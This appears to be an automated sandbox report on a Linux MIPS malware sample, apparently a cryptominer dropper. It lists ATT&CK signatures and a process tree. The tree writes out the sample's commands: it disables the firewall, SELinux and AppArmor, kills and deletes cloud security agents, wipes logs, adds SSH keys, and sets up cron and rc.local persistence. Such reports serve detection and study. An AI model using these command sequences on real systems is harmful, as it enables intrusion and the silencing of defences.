1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Analysis

max time kernel
148s
max time network
122s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20-10-2024 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
Size

46KB
MD5

150dc9ae7c5729552ec2e92a7bc49095
SHA1

2aed6d97f2c3400e1eb7e136e245a6f45ef4ae1f
SHA256

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
SHA512

13c40ba893a9f7a0f3e674400025f65e041e91f09b6def779078e391e35a3dedaf55742e68ae0b9b6f3c9120c1628266fb16348b674e988d146ed3d7b2c3f9c7
SSDEEP

768:bxlT2wDuWvWi7JFNcuFkc2zq0x3UKnicZuiR/amT8z:8wF+Lc2/FicfSmT8z

Score

8^/10

defense_evasion discovery execution persistence privilege_escalatio privilege_escalation upx

Malware Config

Signatures

Adds new SSH keys 1 TTPs 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
persistence privilege_escalation

SSH Authorized Keys
T1098.004

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description ioc process

File opened for modification /root/.ssh/authorized_keys 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

2478
2484
2487
711 chmod
713 chmod
2451
2454
2457
Executes dropped EXE 1 IoCs

Processes:

ioc pid process

/etc/zzh 2483
Flushes firewall rules 1 TTPs 6 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
defense_evasion

Disable or Modify System Firewall
T1562.004

Processes:

iptables

pid process

2492
2493
2495
2497
722 iptables
2491
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Adversary-in-the-Middle
T1557

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description ioc process

File opened for modification /etc/resolv.conf 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File opened for modification	/root/.ssh/authorized_keys	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

pid	process
2478
2484
2487
711	chmod
713	chmod
2451
2454
2457

ioc	pid	process
/etc/zzh	2483

pid	process
2492
2493
2495
2497
722	iptables
2491

description	ioc	process
File opened for modification	/etc/resolv.conf	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargschattrxargsxargschattrxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	process
1860
2159
879	xargs
1071	xargs
1168	xargs
1306	xargs
1414	xargs
2108
2127
2207
972	xargs
990	xargs
1002	xargs
1798	xargs
1802
2250
2460
714	chattr
1252	xargs
2132
856	xargs
1523	xargs
794	xargs
1147	xargs
1359	xargs
1467	xargs
923	chattr
1232	xargs
1758	xargs
1796	xargs
912	chattr
1023	xargs
1161	xargs
1818
1866
2248
734	chattr
978	xargs
1242	xargs
1384	xargs
1764	xargs
922	chattr
1450	xargs
1629	xargs
1061	xargs
1790	xargs
984	xargs
1056	xargs
1109	xargs
1154	xargs
1752	xargs
1696	xargs
2469
1287	xargs
1296	xargs
1342	xargs
1488	xargs
1666	xargs
1721	xargs
2211
2245
1082	xargs
1213	xargs
1311	xargs

Creates/modifies Cron job 1 TTPs 4 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File opened for modification	/etc/crontab	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/etc/cron.daily/logrotate	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/etc/cron.hourly/0anacron	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/etc/cron.d/zzh	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Deletes log files 1 TTPs 2 IoCs

Deletes log files on the system.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File truncated	/var/log/wtmp	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File truncated	/var/log/secure	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Disables AppArmor 62 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	process
782	systemctl
782	systemctl
2110
782	systemctl
2110
2117
2124
2228
2119
2498
2498
774	systemctl
2501
2498
774	systemctl
774	systemctl
2220
2119
2220
2231
2052
2119
2498
2498
785	systemctl
2115
2122
2119
787	systemctl
2228
2235
2233
774	systemctl
774	systemctl
2110
2119
2119
2220
2110
2227
2228
2228
774	systemctl
782	systemctl
782	systemctl
789	systemctl
2110
2220
781	systemctl
2053
2223
2225
2220
2502
2113
2228
782	systemctl
2110
2118
2220
2228
2498

Disables SELinux 1 TTPs 11 IoCs
Disables SELinux security module.
defense_evasion

Disable or Modify Tools
T1562.001

Processes:

setenforcekillkillkillgrepgrepkillkillkillgrepgrep

pid process

773 setenforce
1077 kill
1077 kill
1077 kill
1372 grep
1684 grep
1077 kill
1077 kill
1077 kill
1260 grep
1704 grep
Enumerates running processes
Discovers information about currently running processes on the system
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
persistence

Boot or Logon Autostart Execution
T1547

RC Scripts
T1037.004

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description ioc process

File opened for modification /etc/rc.d/rc.local 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

pid	process
773	setenforce
1077	kill
1077	kill
1077	kill
1372	grep
1684	grep
1077	kill
1077	kill
1077	kill
1260	grep
1704	grep

description	ioc	process
File opened for modification	/etc/rc.d/rc.local	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Write file to user bin folder 6 IoCs

persistence

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File opened for modification	/usr/bin/ip6network	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/kswaped	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/irqbalanced	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/rctlcli	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/systemd-network	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/usr/bin/pamdicks	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Writes file to system bin folder 6 IoCs

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File opened for modification	/bin/pstree
File opened for modification	/bin/ps	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/bin/ps
File opened for modification	/bin/top	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/bin/top
File opened for modification	/bin/pstree	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

/etc/zzh upx

resource	yara_rule
/etc/zzh	upx

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspgreppspskillpgreppspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online

Enumerates kernel/hardware configuration 1 TTPs 29 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

description	ioc	process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	process
837	ps
1157	ps
1435	ps
1624	ps
1667	ps
808	ps
1283	ps
1328	ps
1385	ps
1400	ps
1462	ps
1468	ps
1553	ps
1606	ps
1052	ps
1228	ps
1238	ps
1258	ps
1268	ps
1307	ps
1343	ps
1410	ps
1588	ps
1253	ps
1333	ps
1338	ps
1547	ps
1559	ps
1582	ps
1630	ps
1652	ps
852	ps
1143	ps
1456	ps
1657	ps
1062	ps
1105	ps
842	ps
1395	ps
1451	ps
1489	ps
1524	ps
1565	ps
1112	ps
1446	ps
769	ps
869	ps
1317	ps
1405	ps
1420	ps
1278	ps
1636	ps
1083	ps
1131	ps
1440	ps
1484	ps
1519	ps
1577	ps
847	ps
1098	ps
1195	ps
1600	ps
1221	ps
1350	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspgreppspspspspspspspspgreppspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/381/status	ps
File opened for reading	/proc/13/status
File opened for reading	/proc/77/status
File opened for reading	/proc/933/status	ps
File opened for reading	/proc/381/cmdline	ps
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/16/status
File opened for reading	/proc/681/cmdline
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/362/stat	ps
File opened for reading	/proc/710/stat	ps
File opened for reading	/proc/109/stat	ps
File opened for reading	/proc/82/cmdline	ps
File opened for reading	/proc/70/cmdline	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/682/status	pgrep
File opened for reading	/proc/15/status
File opened for reading	/proc/364/cmdline
File opened for reading	/proc/682/status	ps
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/679/status
File opened for reading	/proc/333/status
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/170/status	ps
File opened for reading	/proc/2/cmdline
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/17/status
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/filesystems	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/1577/status	ps
File opened for reading	/proc/6/cmdline
File opened for reading	/proc/24/status
File opened for reading	/proc/73/status
File opened for reading	/proc/160/cmdline
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/160/stat	ps
File opened for reading	/proc/387/status
File opened for reading	/proc/709/cmdline
File opened for reading	/proc/252/status	ps
File opened for reading	/proc/709/cmdline	ps
File opened for reading	/proc/681/cmdline	ps
File opened for reading	/proc/669/cmdline	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/434/cmdline
File opened for reading	/proc/72/status
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/1142/cmdline	ps
File opened for reading	/proc/176/status	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/75/status
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/673/stat	ps

System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

grepchattrchattrgrepgrep

pid process

1501 grep
2010
2498
909 chattr
920 chattr
1255 grep
1285 grep

pid	process
1501	grep
2010
2498
909	chattr
920	chattr
1255	grep
1285	grep

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

description	ioc	process
File opened for modification	/tmp/svcguard	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/tmp/fileutl.message.slm6da
File opened for modification	/tmp/fileutl.message.szQy1g
File opened for modification	/tmp/fileutl.message.8gYmek
File opened for modification	/tmp/fileutl.message.p66Ofn
File opened for modification	/tmp/fileutl.message.YkiYuv
File opened for modification	/tmp/svcupdate	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/tmp/kdevtmpfsi	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
File opened for modification	/tmp/fileutl.message.GEE7Qo
File opened for modification	/tmp/fileutl.message.eihmyy
File opened for modification	/tmp/fileutl.message.VFcqbH
File opened for modification	/tmp/dev/null	1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Software Deployment Tools 1 TTPs 1 IoCs
Use software deployment tools to execute code.
execution

Software Deployment Tools
T1072

Processes:

pid process

2509

pid	process
2509

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
1⤵
- Adds new SSH keys
- Writes DNS configuration
- Creates/modifies Cron job
- Deletes log files
- Modifies rc script
- Write file to user bin folder
- Writes file to system bin folder
- Writes file to tmp directory
PID:710
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:711
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:714
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:717
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:722
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:727
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:730
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:732
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:734
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:736
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:738
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:741
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:742
- /bin/sync
  sync
  2⤵
  PID:745
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:747
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:748
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:749
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:751
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:753
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:755
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:757
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:759
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:760
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:762
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:763
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:764
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:765
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:767
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:768
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:769
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:770
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:772
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:771
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:773
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:774
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:775
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:776
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:777
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:779
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:780
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:774
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:774
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:774
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:774
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:774
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:774
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:781
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:782
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:783
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:784
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:785
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:788
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:787
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:782
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:782
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:782
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:782
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:782
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:782
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:789
- /bin/ps
  ps aux
  2⤵
  PID:790
- /bin/grep
  grep -v grep
  2⤵
  PID:791
- /bin/grep
  grep aegis
  2⤵
  PID:792
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:794
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:799
- /bin/grep
  grep Yun
  2⤵
  PID:797
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:798
- /bin/grep
  grep -v grep
  2⤵
  PID:796
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:795
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:805
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:807
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:807
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:807
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:807
- - /sbin/rm
    rm -rf
    3⤵
    PID:807
- - /bin/rm
    rm -rf
    3⤵
    PID:807
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:804
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:806
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:806
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:806
- - /usr/bin/dirname
    dirname
    3⤵
    PID:806
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:803
- /bin/grep
  grep aegis
  2⤵
  PID:802
- /bin/grep
  grep -v grep
  2⤵
  PID:801
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:800
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:812
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:814
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:814
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:814
- - /usr/bin/dirname
    dirname
    3⤵
    PID:814
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:813
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:815
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:815
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:815
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:815
- - /sbin/rm
    rm -rf
    3⤵
    PID:815
- - /bin/rm
    rm -rf
    3⤵
    PID:815
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:811
- /bin/grep
  grep hids
  2⤵
  PID:810
- /bin/grep
  grep -v grep
  2⤵
  PID:809
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:808
- /bin/grep
  grep cloudwalker
  2⤵
  PID:818
- /bin/grep
  grep -v grep
  2⤵
  PID:817
- /bin/ps
  ps aux
  2⤵
  PID:816
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:819
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:820
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:822
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:822
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:822
- - /usr/bin/dirname
    dirname
    3⤵
    PID:822
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:821
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:823
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:823
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:823
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:823
- - /sbin/rm
    rm -rf
    3⤵
    PID:823
- - /bin/rm
    rm -rf
    3⤵
    PID:823
- /usr/bin/xargs
  xargs rm -rf
  2⤵
  PID:829
- - /usr/local/sbin/rm
    rm -rf
    3⤵
    PID:831
- - /usr/local/bin/rm
    rm -rf
    3⤵
    PID:831
- - /usr/sbin/rm
    rm -rf
    3⤵
    PID:831
- - /usr/bin/rm
    rm -rf
    3⤵
    PID:831
- - /sbin/rm
    rm -rf
    3⤵
    PID:831
- - /bin/rm
    rm -rf
    3⤵
    PID:831
- /usr/bin/xargs
  xargs dirname
  2⤵
  PID:828
- - /usr/local/sbin/dirname
    dirname
    3⤵
    PID:830
- - /usr/local/bin/dirname
    dirname
    3⤵
    PID:830
- - /usr/sbin/dirname
    dirname
    3⤵
    PID:830
- - /usr/bin/dirname
    dirname
    3⤵
    PID:830
- /usr/bin/awk
  awk "{print \$11}"
  2⤵
  PID:827
- /bin/grep
  grep titanagent
  2⤵
  PID:826
- /bin/grep
  grep -v grep
  2⤵
  PID:825
- /bin/ps
  ps aux
  2⤵
  PID:824
- /usr/bin/xargs
  xargs -I "{}" kill -9 "{}"
  2⤵
  PID:836
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:835
- /bin/grep
  grep edr
